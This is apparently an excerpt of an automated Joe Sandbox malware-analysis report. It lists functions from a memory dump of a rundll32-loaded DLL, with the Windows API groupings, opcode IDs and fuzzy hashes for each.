                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2238633743-3916222277
                                                                                                                                                      • Opcode ID: a37ed814ba2cf336e4cbddf834b1582fd7b3911756c1b499f3e3b000daf6ff87
                                                                                                                                                      • Instruction ID: aa28e73ee2027131957a6cb940cd52b173305a206f702e5c4e34a19894a9f935
                                                                                                                                                      • Opcode Fuzzy Hash: a37ed814ba2cf336e4cbddf834b1582fd7b3911756c1b499f3e3b000daf6ff87
                                                                                                                                                      • Instruction Fuzzy Hash: 2581A724B0DF4295EA50DB63B86457A62A2EF8AFB0F4800F7D94E86B71DE3CE0458710
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4099253644-0
                                                                                                                                                      • Opcode ID: d50e3eed459c5a564bc60c06b1be1ee3dad7a8f450d3f2393c249fb5f7f75772
                                                                                                                                                      • Instruction ID: 30f20caebd803335d7c62a605989ce71dca92db8db544843ea1c6142eb2473e1
                                                                                                                                                      • Opcode Fuzzy Hash: d50e3eed459c5a564bc60c06b1be1ee3dad7a8f450d3f2393c249fb5f7f75772
                                                                                                                                                      • Instruction Fuzzy Hash: D531EA65F4DE4682FE599B53E8553786262BF87FB0F0A05F7D91E0A2B2CF2DA444C200
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1012874770-0
                                                                                                                                                      • Opcode ID: a8b2a289d4c0a6b6613f778cf812589fef98729b94d43987965d83073c14ea8e
                                                                                                                                                      • Instruction ID: 44e40c503b30e7b83a3fbe254c247d9da1368ac7768c4b67a6c5f576af8de3d3
                                                                                                                                                      • Opcode Fuzzy Hash: a8b2a289d4c0a6b6613f778cf812589fef98729b94d43987965d83073c14ea8e
                                                                                                                                                      • Instruction Fuzzy Hash: B3319353B0DD0291EAA4AB63D4925782362AFD2F61F4515F3D50E9A5B6CF2DE884C320
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2238633743-0
                                                                                                                                                      • Opcode ID: 0e2ac940d25909e8ea2453ce127a0fa38817dae2df4a139c0689f8913fe7d8ff
                                                                                                                                                      • Instruction ID: bc180db81493bdef6bbe2621dc9756da442f3f883a867604d3824032ac3a3172
                                                                                                                                                      • Opcode Fuzzy Hash: 0e2ac940d25909e8ea2453ce127a0fa38817dae2df4a139c0689f8913fe7d8ff
                                                                                                                                                      • Instruction Fuzzy Hash: 6C516F24F1DF0395EA50DB63A86537962A2AF9BFB8F4400F7D84E86676DF3CA0448610
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad$FileModuleNamesprintf_s
                                                                                                                                                      • String ID: "%ls",%ls %ls
                                                                                                                                                      • API String ID: 516877753-3684409233
                                                                                                                                                      • Opcode ID: bfabd3e6904ca4b10914a67c278fe26b76a8ce5c833b3c8ae61e8cc866bba34c
                                                                                                                                                      • Instruction ID: 311693ab5421ab2a0c28659eb4aa2a3818740c78058ee1678e34541ad8094a2d
                                                                                                                                                      • Opcode Fuzzy Hash: bfabd3e6904ca4b10914a67c278fe26b76a8ce5c833b3c8ae61e8cc866bba34c
                                                                                                                                                      • Instruction Fuzzy Hash: 74718155B2CE8291EA10EB63D8515BA63A2EF86FA4F8440F3D90E47BA6DF3CD505C350
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2238633743-0
                                                                                                                                                      • Opcode ID: b3a517e90219411be57b913e81de3b1f57b45dfff69b19ed2bf1c57f96d5bf23
                                                                                                                                                      • Instruction ID: 67736c517a1c629a52ca04c5c2a9ef55528a6bd1a73201a8a9b0b4eb683022cb
                                                                                                                                                      • Opcode Fuzzy Hash: b3a517e90219411be57b913e81de3b1f57b45dfff69b19ed2bf1c57f96d5bf23
                                                                                                                                                      • Instruction Fuzzy Hash: 5E61B225B0DF0292EA40EB63E86417963A6AF87FB4F4400F7D98E46775EE3CE445C600
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _errno$_write$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty_lseeki64
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2111832858-0
                                                                                                                                                      • Opcode ID: 7cce346b07e141824153703f7002546526c968b2cadd93361a8cb30d444bcdf2
                                                                                                                                                      • Instruction ID: 0792240dd50de3d81f897db9699c2b2e931819898a7f9d02f076ed82f3785b38
                                                                                                                                                      • Opcode Fuzzy Hash: 7cce346b07e141824153703f7002546526c968b2cadd93361a8cb30d444bcdf2
                                                                                                                                                      • Instruction Fuzzy Hash: E141AD72B0CA4286EB659F26C44167837A2EB46F64F1442F6DA6D473E6DF3CE850C780
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1573762532-0
                                                                                                                                                      • Opcode ID: 6674f68310a896f2c3fef97c531cc157da707083ba8e2f1388e7ea58d2d12ecc
                                                                                                                                                      • Instruction ID: 58e98355ba2565269077e5d29dca5cdf37d4d253aed35778292a9f2e5981e710
                                                                                                                                                      • Opcode Fuzzy Hash: 6674f68310a896f2c3fef97c531cc157da707083ba8e2f1388e7ea58d2d12ecc
                                                                                                                                                      • Instruction Fuzzy Hash: CB410872F0CB9685EB716B1394402B962A2EB12FA4F9441F3DA9C036E1DF2CE940C340
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseEnumOpen$QueryValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2548805652-0
                                                                                                                                                      • Opcode ID: 5d7b43181d3d4d73633ebb36b72b8cfe0eee21ba08ea4b38994a31654aafabc1
                                                                                                                                                      • Instruction ID: fc4a4bf8339452048dfd50fc9884cf4a1a2d3d1865768d93b790edebff1097c6
                                                                                                                                                      • Opcode Fuzzy Hash: 5d7b43181d3d4d73633ebb36b72b8cfe0eee21ba08ea4b38994a31654aafabc1
                                                                                                                                                      • Instruction Fuzzy Hash: 6541403671CEC281D7708B22B8847BAB3A5FB85B64F4041A6D98D53A64DF3CD1459704
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _close_errno_fileno_flush_freebuf_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2366826396-0
                                                                                                                                                      • Opcode ID: 89fb5cea9b6ee5bb09bbb3bb6aa743988ab54a6a14af7b79b44bd93ebf78b2e4
                                                                                                                                                      • Instruction ID: f350cf693bb30d6b168158c5ceda17d3f83db44a004fc69d9dd198cbf1eb88e6
                                                                                                                                                      • Opcode Fuzzy Hash: 89fb5cea9b6ee5bb09bbb3bb6aa743988ab54a6a14af7b79b44bd93ebf78b2e4
                                                                                                                                                      • Instruction Fuzzy Hash: 86014F62F0EE4281FA256AB7849537C11535F97F78F2906F3D919561F2CE6CEC418640
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Sleep$CloseCountCreateHandleMutexTickrand
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2360725408-0
                                                                                                                                                      • Opcode ID: a32011b2d91c7620bf13179f0503f160f340ac96adcb2a6ebed98f9122dbb530
                                                                                                                                                      • Instruction ID: 6c0a57df65323731e96dd395d09923cda0447abe9151d42cc36c9a474ec28d10
                                                                                                                                                      • Opcode Fuzzy Hash: a32011b2d91c7620bf13179f0503f160f340ac96adcb2a6ebed98f9122dbb530
                                                                                                                                                      • Instruction Fuzzy Hash: 0A719F66B1CE8291DA14DB6694521B9B3A2FF86FA4F8481B7DA4E037A1DF3CD506C310
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$File$DeleteLibraryLoadModuleName
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3615269725-0
                                                                                                                                                      • Opcode ID: e4ac4f7ceeb8d0e53d313407caf9963976f0c950728a3915b3837e31b5afdf68
                                                                                                                                                      • Instruction ID: 4d67cf53ca6454e1b08f2a492e12bb3aa72a28e072d0dd13e739110065715792
                                                                                                                                                      • Opcode Fuzzy Hash: e4ac4f7ceeb8d0e53d313407caf9963976f0c950728a3915b3837e31b5afdf68
                                                                                                                                                      • Instruction Fuzzy Hash: 66310B21B1CA8691EE10EB63E8645B95392EF8AFE4F8400F3D94E47B66DE2CD105C710
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2998201375-0
                                                                                                                                                      • Opcode ID: c1980f434cffeb90a237ddd52e95a6ef554b239d004aac1eacc3ead14d471610
                                                                                                                                                      • Instruction ID: 5f911f2471ad9a20cdefa5312efda9a0294db910f879ad48996c3f654479e4df
                                                                                                                                                      • Opcode Fuzzy Hash: c1980f434cffeb90a237ddd52e95a6ef554b239d004aac1eacc3ead14d471610
                                                                                                                                                      • Instruction Fuzzy Hash: A541963270CB8286E7609F16918057977A2EB46FA4F1441B6DB8E577A5CF3CD8418B00
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$ByteCharMultiPointerWide$CloseCreateHandleHeapProcessRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1454824168-0
                                                                                                                                                      • Opcode ID: e979776ee975cefeadad5dac6b7ccabe5dd46d530c91dccb6f2e97dc089be6a9
                                                                                                                                                      • Instruction ID: 4e748f98341836d4afcac64cdc0646d8da10593ec7bb404815517456be14a891
                                                                                                                                                      • Opcode Fuzzy Hash: e979776ee975cefeadad5dac6b7ccabe5dd46d530c91dccb6f2e97dc089be6a9
                                                                                                                                                      • Instruction Fuzzy Hash: C931C621B0CA4286EA509B27646063A7292FF86FB4F5841F6DE8E077A5EF3CD4018740
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModuleStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3950597033-0
                                                                                                                                                      • Opcode ID: 820f33a72edd462d6bbf95b7c83a6fc285ab115bf962e10fae1457ffdc9254b3
                                                                                                                                                      • Instruction ID: 1ad4171330f675ff2ccac12ec9d11a5d71457d7a17a1379c8c01c8e8979deb1b
                                                                                                                                                      • Opcode Fuzzy Hash: 820f33a72edd462d6bbf95b7c83a6fc285ab115bf962e10fae1457ffdc9254b3
                                                                                                                                                      • Instruction Fuzzy Hash: 6C115E3270CA8693DA218B61F45437D6762FB9AFA8F8455B6C64E033A5DF3CD4498B00
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$ByteCharMultiWide$CloseCreateHandlePointerWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2756471129-0
                                                                                                                                                      • Opcode ID: 5403cfd95db986b316707241514d924a2bc15e613ed6cb99a5253c2fec971d89
                                                                                                                                                      • Instruction ID: 68b333a80d24d097387c652c107b71ccc1a6dbcc4a03bd5713d84017a636cf2f
                                                                                                                                                      • Opcode Fuzzy Hash: 5403cfd95db986b316707241514d924a2bc15e613ed6cb99a5253c2fec971d89
                                                                                                                                                      • Instruction Fuzzy Hash: A611C36170CB4186FB509F27745177A6692BB86FF4F0802B6EE8E07BA5DE3CD4458B40
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3604237281-0
                                                                                                                                                      • Opcode ID: b8dd40a9ccc700a02c156772fcb841ebd7cc93f99e9ee328cf72f3f13bff9a5c
                                                                                                                                                      • Instruction ID: 526ce1214b6b38eff062239c4abc8e5977517d97a45efab4ab402db76b8612c5
                                                                                                                                                      • Opcode Fuzzy Hash: b8dd40a9ccc700a02c156772fcb841ebd7cc93f99e9ee328cf72f3f13bff9a5c
                                                                                                                                                      • Instruction Fuzzy Hash: F6018231708B5182E3108B66B85462AB792FB85FF4F444375EAAE43FA8CF3CD4558B40